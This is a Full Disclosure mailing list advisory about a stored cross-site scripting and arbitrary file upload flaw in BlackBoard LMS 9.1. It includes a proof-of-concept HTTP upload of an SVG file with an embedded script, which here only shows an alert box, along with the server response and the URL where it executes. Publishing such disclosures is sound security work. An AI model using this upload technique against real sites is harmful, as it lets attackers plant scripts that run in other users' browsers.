Full Disclosure mailing list archives
BlackBoard LMS (9.1.140152.0) Stored XSS/Arbitrary File Upload
From: Ismail Doe <ismail.sec.dev () gmail com>
Date: Tue, 22 Aug 2017 13:50:02 -0400
Document Title: =============== BlackBoard LMS 9.1 (9.1.140152.0) Stored XSS/Arbitrary File Upload Product Description: =============== The Learning Management System has changed the way students and educators interact. Blackboard's LMS solutions offer much more than simple, classroom interaction, they support the entire education experience enabling educators to not only interact, but truly engage their students in learning. Homepage: http://www.blackboard.com/learning-management-system/index.aspx PoC: =============== POST /webapps/Bb-sites-user-profile-BBLEARN/uploadAvatar.do HTTP/1.1 Host: www.coursesites.com ------WebKitFormBoundaryMB47ytMHFUAG9AAt Content-Disposition: form-data; name="avatarFile"; filename="badsv2.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("ismail1337"); </script> </svg> ------WebKitFormBoundaryMB47ytMHFUAG9AAt-- Response: {"success":true,"message":"/bbcswebdav/users/your_user_id/public_html/badsv2.svg"} Navigate to the returned URL path: https://www.coursesites.com/bbcswebdav/users/your_user_id /public_html/badsv2.svg _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- BlackBoard LMS (9.1.140152.0) Stored XSS/Arbitrary File Upload Ismail Doe (Aug 22)